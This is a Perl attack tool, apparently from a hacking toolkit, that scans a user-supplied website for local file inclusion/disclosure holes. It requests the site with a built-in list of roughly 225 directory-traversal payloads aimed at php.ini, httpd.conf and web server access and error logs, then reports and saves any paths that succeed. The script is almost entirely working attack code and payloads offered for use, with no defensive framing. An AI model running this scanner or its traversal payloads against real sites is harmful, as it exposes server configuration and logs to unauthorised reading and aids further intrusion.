LFD/LFI Paths Checker

1. #!/usr/bin/perl
2. # m-a_labz
3. use HTTP::Request;
4. use LWP::Simple;
5. use Term::ANSIColor;
6. use Win32::Console::ANSI;
7. $|=1;
8. print color("bold black"), "\n\t[+] LFD/LFI Paths Checker\n";
9. a:
10. print color("bold red"), "\n[+] Enter Url : ";
11. print color 'reset';
12. $ex=<STDIN>;
13. chomp($ex);
14. if ($ex =~ /exit/ ||$ex =~ /quit/) {
15. exit;
16. }
17. # keyword if false
18. print color("bold red"), "[+] Enter KeyWord : ";
19. print color 'reset';
20. $keyword=<STDIN>;
21. chomp($keyword);
22. print color("bold red"), "[+] Enter Paths File : ";
23. print color 'reset';
24. $pathsf=<STDIN>;
25. chomp($pathsf);
26. print color("bold red"), "[+] Should I Save Results ? : ";
27. print color 'reset';
28. $save=<STDIN>;
29. chomp($save);
30. if ($ex =~ /http/){
31. $exp = $ex;
32. }else{
33. $exp = "http://".$ex;
34. }
35. if ($pathsf =~ /.txt/) {
36. open (tt, "<$pathsf") || die "[-] Can't open Paths List !";
37. my @tt = <tt>;
38. close tt;
39. }
40. elsif ($pathsf =~ /inside/)
41. {
42. @tt = (
43. '/usr/local/apache/logs/audit_log',
44. '/logs/security_debug_log',
45. '/logs/security_log',
46. '/var/log/lighttpd.error.log',
47. '/var/log/lighttpd.access.log',
48. '/var/lighttpd.log',
49. '/var/logs/access.log',
50. '/var/log/lighttpd/',
51. '/var/log/lighttpd/error.log',
52. '/var/log/lighttpd/access.www.log',
53. '/var/log/lighttpd/error.www.log',
54. '/var/log/lighttpd/access.log',
55. '/usr/local/apache2/logs/lighttpd.error.log',
56. '/usr/local/apache2/logs/lighttpd.log',
57. '/usr/local/apache/logs/lighttpd.error.log',
58. '/usr/local/apache/logs/lighttpd.log',
59. '/var/log/lighttpd.access.log',
60. '/var/log/lighttpd.error.log',
61. '/usr/local/lighttpd/log/lighttpd.error.log',
62. '/usr/local/lighttpd/log/access.log',
63. '../../../../../../../../../etc/php.ini',
64. '../../../../../../../../../bin/php.ini',
65. '../../../../../../../../../etc/httpd/php.ini',
66. '../../../../../../../../../usr/lib/php.ini',
67. '../../../../../../../../../usr/lib/php/php.ini',
68. '../../../../../../../../../usr/local/etc/php.ini',
69. '../../../../../../../../../usr/local/lib/php.ini',
70. '../../../../../../../../../usr/local/php/lib/php.ini',
71. '../../../../../../../../../usr/local/php4/lib/php.ini',
72. '../../../../../../../../../usr/local/php5/lib/php.ini',
73. '../../../../../../../../../usr/local/apache/conf/php.ini',
74. '../../../../../../../../../etc/php4.4/fcgi/php.ini',
75. '../../../../../../../../../etc/php4/apache/php.ini',
76. '../../../../../../../../../etc/php4/apache2/php.ini',
77. '../../../../../../../../../etc/php5/apache/php.ini',
78. '../../../../../../../../../etc/php5/apache2/php.ini',
79. '../../../../../../../../../etc/php/php.ini',
80. '../../../../../../../../../etc/php/php4/php.ini',
81. '../../../../../../../../../etc/php/apache/php.ini',
82. '../../../../../../../../../etc/php/apache2/php.ini',
83. '../../../../../../../../../web/conf/php.ini',
84. '../../../../../../../../../usr/local/Zend/etc/php.ini',
85. '../../../../../../../../../opt/xampp/etc/php.ini',
86. '../../../../../../../../../var/local/www/conf/php.ini',
87. '../../../../../../../../../etc/php/cgi/php.ini',
88. '../../../../../../../../../etc/php4/cgi/php.ini',
89. '../../../../../../../../../etc/php5/cgi/php.ini',
90. '../../../../../../../../../php5\php.ini',
91. '../../../../../../../../../php4\php.ini',
92. '../../../../../../../../../php\php.ini',
93. '../../../../../../../../../PHP\php.ini',
94. '../../../../../../../../../WINDOWS\php.ini',
95. '../../../../../../../../../WINNT\php.ini',
96. '../../../../../../../../../apache\php\php.ini',
97. '../../../../../../../../../xampp\apache\bin\php.ini',
98. '../../../../../../../../../NetServer\bin\stable\apache\php.ini',
99. '../../../../../../../../../home2\bin\stable\apache\php.ini',
100. '../../../../../../../../../home\bin\stable\apache\php.ini',
101. '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
102. '../../../../../../../../../../../../var/log/httpd/access_log',
103. '../../../../../../../../../../../../var/log/httpd/error_log',
104. '../../../../../../../../../../var/log/httpd/access_log',
105. '../../../../../../../../../../var/log/httpd/error_log',
106. '../apache/logs/error.log',
107. '../apache/logs/access.log',
108. '../../apache/logs/error.log',
109. '../../apache/logs/access.log',
110. '../../../apache/logs/error.log',
111. '../../../apache/logs/access.log',
112. '../../../../apache/logs/error.log',
113. '../../../../apache/logs/access.log',
114. '../../../../../apache/logs/error.log',
115. '../../../../../apache/logs/access.log',
116. '../apache2/logs/error.log',
117. '../apache2/logs/access.log',
118. '../../apache2/logs/error.log',
119. '../../apache2/logs/access.log',
120. '../../../apache2/logs/error.log',
121. '../../../apache2/logs/access.log',
122. '../../../../apache2/logs/error.log',
123. '../../../../apache2/logs/access.log',
124. '../../../../../apache2/logs/error.log',
125. '../../../../../apache2/logs/access.log',
126. '../logs/error.log',
127. '../logs/access.log',
128. '../../logs/error.log',
129. '../../logs/access.log',
130. '../../../logs/error.log',
131. '../../../logs/access.log',
132. '../../../../logs/error.log',
133. '../../../../logs/access.log',
134. '../../../../../logs/error.log',
135. '../../../../../logs/access.log',
136. '../../../../../../../../../../etc/httpd/logs/acces_log',
137. '../../../../../../../../../../etc/httpd/logs/acces.log',
138. '../../../../../../../../../../etc/httpd/logs/error_log',
139. '../../../../../../../../../../etc/httpd/logs/error.log',
140. '../../../../../../../../../../usr/local/apache/logs/access_log',
141. '../../../../../../../../../../usr/local/apache/logs/access.log',
142. '../../../../../../../../../../usr/local/apache/logs/error_log',
143. '../../../../../../../../../../usr/local/apache/logs/error.log',
144. '../../../../../../../../../../usr/local/apache2/logs/access_log',
145. '../../../../../../../../../../usr/local/apache2/logs/access.log',
146. '../../../../../../../../../../usr/local/apache2/logs/error_log',
147. '../../../../../../../../../../usr/local/apache2/logs/error.log',
148. '../../../../../../../../../../var/www/logs/access_log',
149. '../../../../../../../../../../var/www/logs/access.log',
150. '../../../../../../../../../../var/www/logs/error_log',
151. '../../../../../../../../../../var/www/logs/error.log',
152. '../../../../../../../../../../var/log/httpd/access_log',
153. '../../../../../../../../../../var/log/httpd/access.log',
154. '../../../../../../../../../../var/log/httpd/error_log',
155. '../../../../../../../../../../var/log/httpd/error.log',
156. '../../../../../../../../../../var/log/apache/access_log',
157. '../../../../../../../../../../var/log/apache/access.log',
158. '../../../../../../../../../../var/log/apache/error_log',
159. '../../../../../../../../../../var/log/apache/error.log',
160. '../../../../../../../../../../var/log/apache2/access_log',
161. '../../../../../../../../../../var/log/apache2/access.log',
162. '../../../../../../../../../../var/log/apache2/error_log',
163. '../../../../../../../../../../var/log/apache2/error.log',
164. '../../../../../../../../../../var/log/access_log',
165. '../../../../../../../../../../var/log/access.log',
166. '../../../../../../../../../../var/log/error_log',
167. '../../../../../../../../../../var/log/error.log',
168. '../../../../../../../../../../opt/lampp/logs/access_log',
169. '../../../../../../../../../../opt/lampp/logs/error_log',
170. '../../../../../../../../../../opt/xampp/logs/access_log',
171. '../../../../../../../../../../opt/xampp/logs/error_log',
172. '../../../../../../../../../../opt/lampp/logs/access.log',
173. '../../../../../../../../../../opt/lampp/logs/error.log',
174. '../../../../../../../../../../opt/xampp/logs/access.log',
175. '../../../../../../../../../../opt/xampp/logs/error.log',
176. '../../../apache/logs/error.log',
177. '../../../apache/logs/access.log',
178. '../../../../apache/logs/error.log',
179. '../../../../apache/logs/access.log',
180. '../../../../../apache/logs/error.log',
181. '../../../../../apache/logs/access.log',
182. '../../../../../../apache/logs/error.log',
183. '../../../../../../apache/logs/access.log',
184. '../../../../../../../apache/logs/error.log',
185. '../../../../../../../apache/logs/access.log',
186. '../../../../../../../../apache/logs/error.log',
187. '../../../../../../../../apache/logs/access.log',
188. '../../../logs/error.log',
189. '../../../logs/access.log',
190. '../../../../logs/error.log',
191. '../../../../logs/access.log',
192. '../../../../../logs/error.log',
193. '../../../../../logs/access.log',
194. '../../../../../../logs/error.log',
195. '../../../../../../logs/access.log',
196. '../../../../../../../logs/error.log',
197. '../../../../../../../logs/access.log',
198. '../../../../../../../../logs/error.log',
199. '../../../../../../../../logs/access.log',
200. '../../../../../../../../../../../../etc/httpd/logs/acces_log',
201. '../../../../../../../../../../../../etc/httpd/logs/acces.log',
202. '../../../../../../../../../../../../etc/httpd/logs/error_log',
203. '../../../../../../../../../../../../etc/httpd/logs/error.log',
204. '../../../../../../../../../../../../var/www/logs/access_log',
205. '../../../../../../../../../../../../var/www/logs/access.log',
206. '../../../../../../../../../../../../usr/local/apache/logs/access_log',
207. '../../../../../../../../../../../../usr/local/apache/logs/access.log',
208. '../../../../../../../../../../../../var/log/apache/access_log',
209. '../../../../../../../../../../../../var/log/apache/access.log',
210. '../../../../../../../../../../../../var/log/access_log',
211. '../../../../../../../../../../../../var/www/logs/error_log',
212. '../../../../../../../../../../../../var/www/logs/error.log',
213. '../../../../../../../../../../../../usr/local/apache/logs/error_log',
214. '../../../../../../../../../../../../usr/local/apache/logs/error.log',
215. '../../../../../../../../../../../../var/log/apache/error_log',
216. '../../../../../../../../../../../../var/log/apache/error.log',
217. '../../../../../../../../../../../../var/log/access_log',
218. '../../../../../../../../../../../../var/log/error_log',
219. '../../../../../../usr/local/apache/conf/httpd.conf',
220. '../../../../../../usr/local/apache2/conf/httpd.conf',
221. '../../../../../../etc/httpd/conf/httpd.conf',
222. '../../../../../../etc/apache/conf/httpd.conf',
223. '../../../../../../usr/local/etc/apache/conf/httpd.conf',
224. '../../../../../../etc/apache2/httpd.conf',
225. '../../../../../../../../../usr/local/apache/conf/httpd.conf',
226. '../../../../../../../../../usr/local/apache2/conf/httpd.conf',
227. '../../../../../../../../usr/local/apache/httpd.conf',
228. '../../../../../../../../usr/local/apache2/httpd.conf',
229. '../../../../../../../../usr/local/httpd/conf/httpd.conf',
230. '../../../../../../../usr/local/etc/apache/conf/httpd.conf',
231. '../../../../../../../usr/local/etc/apache2/conf/httpd.conf',
232. '../../../../../../../usr/local/etc/httpd/conf/httpd.conf',
233. '../../../../../../../usr/apache2/conf/httpd.conf',
234. '../../../../../../../usr/apache/conf/httpd.conf',
235. '../../../../../../../usr/local/apps/apache2/conf/httpd.conf',
236. '../../../../../../../usr/local/apps/apache/conf/httpd.conf',
237. '../../../../../../etc/apache/conf/httpd.conf',
238. '../../../../../../etc/apache2/conf/httpd.conf',
239. '../../../../../../etc/httpd/conf/httpd.conf',
240. '../../../../../../../../../etc/php5/apache2/httpd/conf/httpd.conf',
241. '../../../../../../etc/http/conf/httpd.conf',
242. '../../../../../../etc/apache2/httpd.conf',
243. '../../../../../../etc/httpd/httpd.conf',
244. '../../../../../../etc/http/httpd.conf',
245. '../../../../../../etc/httpd.conf',
246. '../../../../../opt/apache/conf/httpd.conf',
247. '../../../../../opt/apache2/conf/httpd.conf',
248. '../../../../../../../../../etc/php5/apache2/conf/httpd.conf',
249. '../../../../var/www/conf/httpd.conf',
250. '../../../private/etc/httpd/httpd.conf',
251. '../../../private/etc/httpd/httpd.conf.default',
252. '../../Volumes/webBackup/opt/apache2/conf/httpd.conf',
253. '../../Volumes/webBackup/private/etc/httpd/httpd.conf',
254. '../../Volumes/webBackup/private/etc/httpd/httpd.conf.default',
255. '../../../../../../../../../usr/local/php/httpd.conf.php',
256. '../../../../../../../../../usr/local/php4/httpd.conf.php',
257. '../../../../../../../../../usr/local/php5/httpd.conf.php',
258. '../../../../../../../../../usr/local/php/httpd.conf',
259. '../../../../../../../../../usr/local/php4/httpd.conf',
260. '../../../../../../../../../usr/local/php5/httpd.conf',
261. '../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
262. '../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
263. '../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
264. '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
265. '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
266. '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
267. '/usr/local/etc/apache/vhosts.conf'
268. );
269. }else{
270. print color("bold blue"), "\n\tZuHaHaHaHaHa My Master Is BAKA :P\n";
271. print color 'reset';
272. }
273. foreach $path (@tt)
274. {
275. chomp $path;
276. $url = $exp.$path ;
277. $request = HTTP::Request->new(GET=>$url);
278. $useragent = LWP::UserAgent->new();
279. $useragent->timeout(5);
280. $response = $useragent->request($request);
281. if ($response->content=~m/$keyword/g)
282. {
283. if ($ARGV[0] =~ "-v" ){
284. } else {
285. print color("bold white"), "[.] $path ";
286. print "Not Found\n";
287. }
288. } else {
289. print color("bold red"), "[+] FOUND => ";
290. print color("bold yellow"), "$path\n";
291. print color 'reset';
292. if ($save =~ /.txt/)
293. {
294. open(a, ">>$save");
295. print a "$path\n";
296. close(a);
297. }
298. }
299. next;
300. }
301.  
302. print color 'reset';
303. print "\n\t\t[+] Enter 1 To Go Back To Menu : ";my $back=<STDIN>;
304. chomp $back;
305. if ($back eq "1")
306. {
307. system("cls");
308. require("../main.pl");
309. }
310. goto a;